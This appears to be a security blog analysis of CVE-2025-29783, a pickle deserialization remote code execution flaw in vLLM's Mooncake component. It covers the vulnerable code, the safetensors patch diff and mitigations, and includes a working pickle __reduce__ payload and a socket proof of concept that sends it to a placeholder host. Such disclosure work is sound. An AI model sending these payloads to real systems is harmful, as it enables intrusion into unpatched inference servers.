vLLM

CVE-2025-29783: Remote Code Execution in vLLM via Unsafe Deserialization in Mooncake

Robert Morgan

Mar 19, 2025 — 7 min read

Executive Summary

CVE-2025-29783 is a critical remote code execution (RCE) vulnerability affecting vLLM, a high-throughput and memory-efficient inference and serving engine for Large Language Models (LLMs). The vulnerability stems from the use of unsafe deserialization via pickle within the Mooncake component, which is used for distributed key-value (KV) cache management. When vLLM is configured to use Mooncake, this vulnerability allows unauthenticated attackers to execute arbitrary code on distributed hosts by sending malicious serialized data over ZMQ/TCP on all network interfaces. The fix involves replacing pickle with safetensors for serialization, mitigating the risk of RCE. This vulnerability has a CVSS v3.1 base score of 10.0, indicating its critical severity.

Technical Details

The vulnerability resides in the mooncake_pipe.py file within the vLLM project, specifically in the vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py module. This module is responsible for transferring KV caches between distributed nodes using ZeroMQ (ZMQ) over TCP. The affected versions are prior to 0.8.0. The core issue is the use of Python's pickle module to serialize and deserialize tensor data during the transfer process.

The vulnerable code is located within the _send_impl and _recv_impl methods of the MooncakeKVPipe class. These methods are responsible for sending and receiving tensor data, respectively.

    def _send_impl(self, tensor: torch.Tensor) -> None:
        """Implement the tensor sending logic."""
        value_bytes = pickle.dumps(tensor)
        self.transfer_engine.send_bytes(value_bytes)

    def _recv_impl(self) -> torch.Tensor:
        """Implement the tensor receiving logic."""
        data = self.transfer_engine.recv_bytes()
        return pickle.loads(data)

The pickle.dumps() function serializes the tensor into a byte stream, which is then sent over the network. On the receiving end, pickle.loads() deserializes the byte stream back into a tensor. The problem with pickle is that it is inherently unsafe when dealing with untrusted data. Deserializing a pickle stream can execute arbitrary Python code embedded within the stream.

Affected systems are those running vLLM with Mooncake enabled for distributed KV cache management. This typically involves a cluster of machines communicating over a network using ZMQ/TCP. The vulnerability is exposed on all network interfaces, meaning that any machine on the network (or even outside the network if the ports are exposed) can potentially exploit it.

Root Cause Analysis

The root cause of CVE-2025-29783 is the use of Python's pickle module for serializing and deserializing data in a network-exposed service. pickle is known to be vulnerable to arbitrary code execution because the deserialization process can instantiate arbitrary Python objects, including those that execute system commands or perform other malicious actions.

The MooncakeKVPipe class in vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py uses pickle to serialize PyTorch tensors before sending them over the network and to deserialize them upon receipt. This means that an attacker who can send data to the ZMQ/TCP port used by Mooncake can inject malicious pickle payloads that will be executed by the receiving vLLM instance.

Here's a breakdown of how the vulnerability can be exploited:

Attacker crafts a malicious pickle payload: The attacker creates a pickle stream that, when deserialized, will execute arbitrary Python code. This can be achieved using various techniques, such as using the __reduce__ method to specify a function to be called during deserialization.
Attacker sends the malicious payload to the vLLM instance: The attacker sends the crafted pickle stream to the ZMQ/TCP port used by the Mooncake component of vLLM.
vLLM instance deserializes the payload: The receiving vLLM instance calls pickle.loads() on the received data, which deserializes the malicious payload and executes the embedded code.
Arbitrary code execution: The attacker's code is executed on the vLLM instance, allowing them to perform actions such as reading sensitive data, modifying files, or even taking complete control of the system.

The following is an example of a malicious pickle payload that executes the uname -a command:

import pickle
import os

class RCE:
    def __reduce__(self):
        cmd = ('uname', '-a')
        return (os.system, cmd)

serialized_data = pickle.dumps(RCE())

# This serialized_data can be sent to the vulnerable vLLM instance
# When the vLLM instance deserializes this data using pickle.loads(),
# it will execute the uname -a command.

This payload defines a class RCE with a __reduce__ method. The __reduce__ method is a special method that pickle uses to determine how to serialize and deserialize an object. In this case, it tells pickle to call the os.system function with the arguments ('uname', '-a') when the object is deserialized.

Patch Analysis

The fix for CVE-2025-29783 involves replacing the use of pickle with safetensors for serializing and deserializing tensor data in the MooncakeKVPipe class. safetensors is a safer alternative to pickle because it only allows the serialization and deserialization of tensor data and does not allow arbitrary code execution.

The following diff shows the changes made to vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py:

--- a/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
+++ b/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
@@ -2,13 +2,14 @@
 
 import json
 import os
-import pickle
 from concurrent.futures import ThreadPoolExecutor
 from dataclasses import dataclass
 from typing import Optional, Union
 
 import torch
 import zmq
+from safetensors.torch import load as safetensors_load
+from safetensors.torch import save as safetensors_save
 
 from vllm.config import KVTransferConfig
 from vllm.distributed.kv_transfer.kv_pipe.base import KVPipeBase
@@ -237,14 +238,13 @@ def tensor_hash(self, tensor: torch.Tensor) -> int:
         return hash(tensor.data_ptr())
 
     def _send_impl(self, tensor: torch.Tensor) -> None:
-        """Implement the tensor sending logic."""
-        value_bytes = pickle.dumps(tensor)
-        self.transfer_engine.send_bytes(value_bytes)
+        """Implement the tensor sending logic using safetensors."""
+        self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
 
     def _recv_impl(self) -> torch.Tensor:
-        """Implement the tensor receiving logic."""
+        """Implement the tensor receiving logic using safetensors."""
         data = self.transfer_engine.recv_bytes()
-        return pickle.loads(data)
+        return safetensors_load(data)["tensor"].to(self.device)
 
     def send_tensor(self, tensor: Optional[torch.Tensor]) -> None:
         """Send tensor to the target process."""

The patch removes the import pickle statement and adds import safetensors.torch.load as safetensors_load and import safetensors.torch.save as safetensors_save. The _send_impl method is modified to use safetensors_save to serialize the tensor into a byte stream, and the _recv_impl method is modified to use safetensors_load to deserialize the byte stream back into a tensor. The to(self.device) call ensures the tensor is placed on the correct device after deserialization.

Specifically, the following lines were changed:

value_bytes = pickle.dumps(tensor) is replaced with self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
return pickle.loads(data) is replaced with return safetensors_load(data)["tensor"].to(self.device)

The safetensors_save function takes a dictionary as input, where the keys are names for the tensors and the values are the tensors themselves. In this case, the tensor is named "tensor". The safetensors_load function returns a dictionary containing the deserialized tensors. The ["tensor"] syntax is used to access the tensor named "tensor" from the dictionary.

This change effectively eliminates the possibility of arbitrary code execution because safetensors only allows the serialization and deserialization of tensor data and does not allow the execution of arbitrary Python code.

Exploitation Techniques

Given the vulnerability is an unsafe deserialization issue, an attacker can craft a malicious payload using pickle that, when deserialized by the vulnerable vLLM instance, executes arbitrary code.

Here's a conceptual proof-of-concept (PoC) demonstrating how an attacker could exploit this vulnerability. This PoC is made-up and serves to illustrate the general principle of exploiting pickle vulnerabilities. A real exploit would need to be adapted to the specific environment and dependencies of the vLLM instance.

import socket
import pickle
import os

# Target information
TARGET_HOST = "vulnerable_vllm_host"
TARGET_PORT = 12345  # Replace with the actual Mooncake port

# Malicious payload
class RCE:
    def __reduce__(self):
        # Command to execute on the target system
        cmd = ('touch', '/tmp/pwned') # Creates a file /tmp/pwned
        return (os.system, cmd)

payload = pickle.dumps(RCE())

# Create a socket and connect to the target
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((TARGET_HOST, TARGET_PORT))
    print(f"Connected to {TARGET_HOST}:{TARGET_PORT}")

    # Send the malicious payload
    sock.sendall(payload)
    print("Malicious payload sent.")

except socket.error as e:
    print(f"Socket error: {e}")
finally:
    sock.close()
    print("Connection closed.")

Explanation:

Target Information: The TARGET_HOST and TARGET_PORT variables need to be set to the IP address and port number of the vulnerable vLLM instance's Mooncake component.
Malicious Payload: The RCE class defines a __reduce__ method that, when deserialized, will execute the touch /tmp/pwned command on the target system. This command creates a file named /tmp/pwned in the /tmp directory, which is a simple way to verify that the code execution was successful.
Socket Connection: The code creates a socket and connects to the target host and port.
Payload Transmission: The code sends the malicious pickle payload to the target system.
Error Handling: The code includes basic error handling to catch socket errors.

Attack Scenario:

The attacker identifies a vLLM instance running with Mooncake enabled.
The attacker determines the ZMQ/TCP port used by Mooncake (e.g., by examining the vLLM configuration).
The attacker crafts a malicious pickle payload as shown above.
The attacker executes the PoC script, sending the malicious payload to the vLLM instance.
If the exploit is successful, the touch /tmp/pwned command will be executed on the vLLM instance, creating the /tmp/pwned file.

Real-World Impacts:

The impact of this vulnerability is severe. An attacker who successfully exploits this vulnerability can gain complete control of the vLLM instance and potentially the entire cluster of machines running vLLM. This could lead to:

Data Breach: The attacker could steal sensitive data processed by the LLMs.
System Compromise: The attacker could install malware, create backdoors, or use the compromised systems to launch attacks against other targets.
Denial of Service: The attacker could crash the vLLM instance or disrupt its operation.
Reputation Damage: A successful attack could damage the reputation of the organization using vLLM.

Mitigation Strategies

To mitigate the risk of CVE-2025-29783, the following steps should be taken:

Upgrade to vLLM 0.8.0 or later: This version contains the fix for the vulnerability, which replaces pickle with safetensors for serialization.
Disable Mooncake if not needed: If distributed KV cache management is not required, disable Mooncake to eliminate the vulnerability.
Network Segmentation: Isolate the vLLM cluster from the rest of the network to limit the potential impact of a successful attack. Use firewalls to restrict access to the ZMQ/TCP port used by Mooncake.
Authentication and Authorization: Implement authentication and authorization mechanisms to control who can send data to the Mooncake component. This can help prevent unauthorized users from exploiting the vulnerability. However, note that the vulnerability is present even without authentication, so upgrading to the patched version is still essential.
Monitoring and Intrusion Detection: Implement monitoring and intrusion detection systems to detect suspicious activity on the vLLM cluster. This can help identify and respond to attacks in a timely manner.
Security Best Practices: Follow general security best practices, such as keeping software up to date, using strong passwords, and educating users about phishing and other social engineering attacks.

Timeline of Discovery and Disclosure

2025-03-04: Initial commit addressing the vulnerability.
2025-03-19: CVE-2025-29783 assigned and publicly disclosed.
2025-03-19: vLLM version 0.8.0 released with the fix.

References

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29783
GitHub Advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7
Commit fixing the vulnerability: https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2
Pull Request fixing the vulnerability: https://github.com/vllm-project/vllm/pull/14228

CVE-2025-29783: Remote Code Execution in vLLM via Unsafe Deserialization in Mooncake

Robert Morgan

Executive Summary

Technical Details

Root Cause Analysis

Patch Analysis

Exploitation Techniques

Mitigation Strategies

Timeline of Discovery and Disclosure

References

Read more

CVE-2025-46569: When OPA Paths Go Rogue - Rego Injection in the Data API

Sequence Break: Unraveling CVE-2025-46337 - SQL Injection in ADOdb's PostgreSQL Driver

CVE-2025-32444: Remote Code Execution Vulnerability in vLLM Mooncake Integration

Déjà Vu RCE: Patching the Patch for Craft CMS (CVE-2025-32432)